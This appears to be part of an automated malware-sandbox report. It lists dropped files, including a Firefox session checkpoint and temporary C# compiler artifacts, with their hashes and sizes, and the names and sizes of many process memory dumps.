283bf2c11d278742037a23a863e8a2059b3a410352ab1ce48bdbfa1fc3fa05eedf0a2519a5063f37a9b40968e33b0d819a66d45bb354019ca01e2a18af1b0e12

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\sessionCheckpoints.json.tmp

Filesize
288B

MD5
6b77a9f779399e95d1cee931a2c8f8ff

SHA1
826efd4feb0d50fcce5696111af7c811b81adcd9

SHA256
3a0285c8233ef0324b269f7291094e19fd9b77259f9419861ad796f7e9c979f3

SHA512
ef537c75fab8e86483ac03cc0d2feaf41575e35f54b95669a26bf6dfbf58021dc9a5bbe54d9537b55da3fbb0e0262adf6c5efd4394faaec81a31604533afec4f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\a5dauy0w\CSC82769E8940E4BF1ABD7B45D675AAC39.TMP

Filesize
652B

MD5
376447cea7195c79f55b01b7e1ef3090

SHA1
7fced33eb00053b13094ee77de439d3be5459e03

SHA256
74b0db2dc117fd06d70a354e21941bf2480d8a89abba9a5be31afc413887e497

SHA512
1dba88b2e8881f3fdfb1d56e590442d6fdd41e696edef6a906ec6dffdff8046058c3fa7f844eb7507577f9944534003ccc6998d91409b62f7171564b6401b05d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\a5dauy0w\a5dauy0w.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\a5dauy0w\a5dauy0w.cmdline

Filesize
607B

MD5
41f66f55617fc65959b1ee6aa89e2f3b

SHA1
258765310ea89f8aa7f29f74a87d0cad01bc94ef

SHA256
5a93330da71696e4890856fe662da29f6f13f66597034ece310b5f962a70db7a

SHA512
3d342f84964e0c36ec025ba46212c2e1da1088bf5c1bb6ab4384b0b5f9f91a9a7cd06cd32aa46cd466fc77207db94d32db746e2b3eb1b7bf91e1ba387a9be882

Download Submit
memory/448-83-0x00007FFBF1213000-0x00007FFBF1215000-memory.dmp

Filesize
8KB

Download
memory/448-85-0x00007FFBF1210000-0x00007FFBF1CD1000-memory.dmp

Filesize
10.8MB

Download
memory/448-96-0x00000191FC070000-0x00000191FC092000-memory.dmp

Filesize
136KB

Download
memory/448-237-0x00007FFBF1210000-0x00007FFBF1CD1000-memory.dmp

Filesize
10.8MB

Download
memory/448-86-0x00007FFBF1210000-0x00007FFBF1CD1000-memory.dmp

Filesize
10.8MB

Download
memory/548-360-0x000002E732740000-0x000002E73295C000-memory.dmp

Filesize
2.1MB

Download
memory/852-58-0x00007FFC02A00000-0x00007FFC02A24000-memory.dmp

Filesize
144KB

Download
memory/852-60-0x00007FFBF2D30000-0x00007FFBF2EAE000-memory.dmp

Filesize
1.5MB

Download
memory/852-238-0x00007FFBF2210000-0x00007FFBF22DD000-memory.dmp

Filesize
820KB

Download
memory/852-928-0x00007FFBF2D30000-0x00007FFBF2EAE000-memory.dmp

Filesize
1.5MB

Download
memory/852-200-0x0000016E477E0000-0x0000016E47D09000-memory.dmp

Filesize
5.2MB

Download
memory/852-199-0x00007FFC02950000-0x00007FFC02983000-memory.dmp

Filesize
204KB

Download
memory/852-82-0x00007FFC02A00000-0x00007FFC02A24000-memory.dmp

Filesize
144KB

Download
memory/852-84-0x00007FFBF2D30000-0x00007FFBF2EAE000-memory.dmp

Filesize
1.5MB

Download
memory/852-80-0x00007FFC08110000-0x00007FFC0812A000-memory.dmp

Filesize
104KB

Download
memory/852-81-0x00007FFBF25E0000-0x00007FFBF26FB000-memory.dmp

Filesize
1.1MB

Download
memory/852-78-0x00007FFC02940000-0x00007FFC0294D000-memory.dmp

Filesize
52KB

Download
memory/852-76-0x00007FFC02100000-0x00007FFC02114000-memory.dmp

Filesize
80KB

Download
memory/852-73-0x00007FFBF1CE0000-0x00007FFBF2209000-memory.dmp

Filesize
5.2MB

Download
memory/852-74-0x00007FFC06130000-0x00007FFC06155000-memory.dmp

Filesize
148KB

Download
memory/852-72-0x0000016E477E0000-0x0000016E47D09000-memory.dmp

Filesize
5.2MB

Download
memory/852-70-0x00007FFBF2F70000-0x00007FFBF3635000-memory.dmp

Filesize
6.8MB

Download
memory/852-71-0x00007FFBF2210000-0x00007FFBF22DD000-memory.dmp

Filesize
820KB

Download
memory/852-341-0x00007FFBF2D30000-0x00007FFBF2EAE000-memory.dmp

Filesize
1.5MB

Download
memory/852-336-0x00007FFC06130000-0x00007FFC06155000-memory.dmp

Filesize
148KB

Download
memory/852-335-0x00007FFBF2F70000-0x00007FFBF3635000-memory.dmp

Filesize
6.8MB

Download
memory/852-66-0x00007FFC02950000-0x00007FFC02983000-memory.dmp

Filesize
204KB

Download
memory/852-64-0x00007FFC02990000-0x00007FFC0299D000-memory.dmp

Filesize
52KB

Download
memory/852-62-0x00007FFC029A0000-0x00007FFC029B9000-memory.dmp

Filesize
100KB

Download
memory/852-295-0x00007FFBF1CE0000-0x00007FFBF2209000-memory.dmp

Filesize
5.2MB

Download
memory/852-56-0x00007FFC08110000-0x00007FFC0812A000-memory.dmp

Filesize
104KB

Download
memory/852-54-0x00007FFC02A30000-0x00007FFC02A5D000-memory.dmp

Filesize
180KB

Download
memory/852-41-0x00007FFC0AFE0000-0x00007FFC0AFEF000-memory.dmp

Filesize
60KB

Download
memory/852-30-0x00007FFC06130000-0x00007FFC06155000-memory.dmp

Filesize
148KB

Download
memory/852-25-0x00007FFBF2F70000-0x00007FFBF3635000-memory.dmp

Filesize
6.8MB

Download
memory/852-809-0x00007FFBF2F70000-0x00007FFBF3635000-memory.dmp

Filesize
6.8MB

Download
memory/852-952-0x00007FFC02A00000-0x00007FFC02A24000-memory.dmp

Filesize
144KB

Download
memory/852-951-0x00007FFC08110000-0x00007FFC0812A000-memory.dmp

Filesize
104KB

Download
memory/852-950-0x00007FFC02A30000-0x00007FFC02A5D000-memory.dmp

Filesize
180KB

Download
memory/852-948-0x00007FFC0AFE0000-0x00007FFC0AFEF000-memory.dmp

Filesize
60KB

Download
memory/852-947-0x00007FFC06130000-0x00007FFC06155000-memory.dmp

Filesize
148KB

Download
memory/852-946-0x00007FFBF1CE0000-0x00007FFBF2209000-memory.dmp

Filesize
5.2MB

Download
memory/852-937-0x00007FFBF25E0000-0x00007FFBF26FB000-memory.dmp

Filesize
1.1MB

Download
memory/852-936-0x00007FFC02940000-0x00007FFC0294D000-memory.dmp

Filesize
52KB

Download
memory/852-935-0x00007FFC02100000-0x00007FFC02114000-memory.dmp

Filesize
80KB

Download
memory/852-921-0x00007FFBF2F70000-0x00007FFBF3635000-memory.dmp

Filesize
6.8MB

Download
memory/852-932-0x00007FFBF2210000-0x00007FFBF22DD000-memory.dmp

Filesize
820KB

Download
memory/852-931-0x00007FFC02950000-0x00007FFC02983000-memory.dmp

Filesize
204KB

Download
memory/852-930-0x00007FFC02990000-0x00007FFC0299D000-memory.dmp

Filesize
52KB

Download
memory/852-929-0x00007FFC029A0000-0x00007FFC029B9000-memory.dmp

Filesize
100KB

Download
memory/3244-233-0x00000186B0890000-0x00000186B0898000-memory.dmp

Filesize
32KB

Download